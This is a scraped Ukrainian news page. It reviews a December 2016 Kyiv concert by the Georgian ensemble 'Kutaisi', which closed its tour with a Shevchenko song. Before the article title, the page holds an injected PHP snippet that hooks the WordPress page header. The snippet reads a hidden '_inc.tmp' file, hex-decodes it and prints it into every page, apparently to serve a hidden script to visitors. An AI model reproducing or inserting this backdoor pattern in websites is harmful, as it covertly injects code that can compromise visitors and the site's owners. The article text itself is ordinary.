if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } “Кутаїсі” захопив киян співом та гарячими танцями – ФОТО, ВІДЕО

“Кутаїсі” захопив киян співом та гарячими танцями – ФОТО, ВІДЕО

Опубліковано: 23/12/2016 20:50
Автор: admin
Рубрика: Огляди, Статті

Грузинський ансамбль пісні та танцю «Кутаїсі» завершив свій украінський тур виступом у столиці України на сцені ДК КПІ. Бездоганне виконання, неймовірні польоти, падіння та обертання на колінах, швидкі рухи молодих і відчайдушних танцівників і танцівниць захопили кожного глядача у величезному залі.

Чарівне багатоголосся і стародавні музичні інструменти оспівують всю красу грузинської землі. Ансамбль чудово поєднує енергію і барвистість танцю з хвилюючим душу вібруючим співом, властивим Грузії.

Насамкінець після шквалу аплодисментів учасники ансамблю захопили аудиторію виконанням вічно живої пісні на вірші Тараса Шевченка “Реве та стогне Дніпр широкий”:

Виступи Грузинського державного ансамблю «Кутаїсі» викликали справжній фурор в багатьох країнах світу: Україні, Вірменії, Франції, Туреччини, Великобританії, Росії, Голландії, Польщі, Італії, Болгарії, Румунії, Марокко та ін.

02 03 08 10 13 14 16 20 22 23 24 25 26 27 28 30 31 32 33 34 35 36 3743

Фото та відео Германа Богапова

Залишити відповідь

Ваша e-mail адреса не оприлюднюватиметься. Обов’язкові поля позначені *

Статистика сторінки:
Переглядів сьогодні:
Переглядів у поточному місяці:
Відповідальність за зміст коментарів, що залишають відвідувачі, несуть їхні автори.
Популярне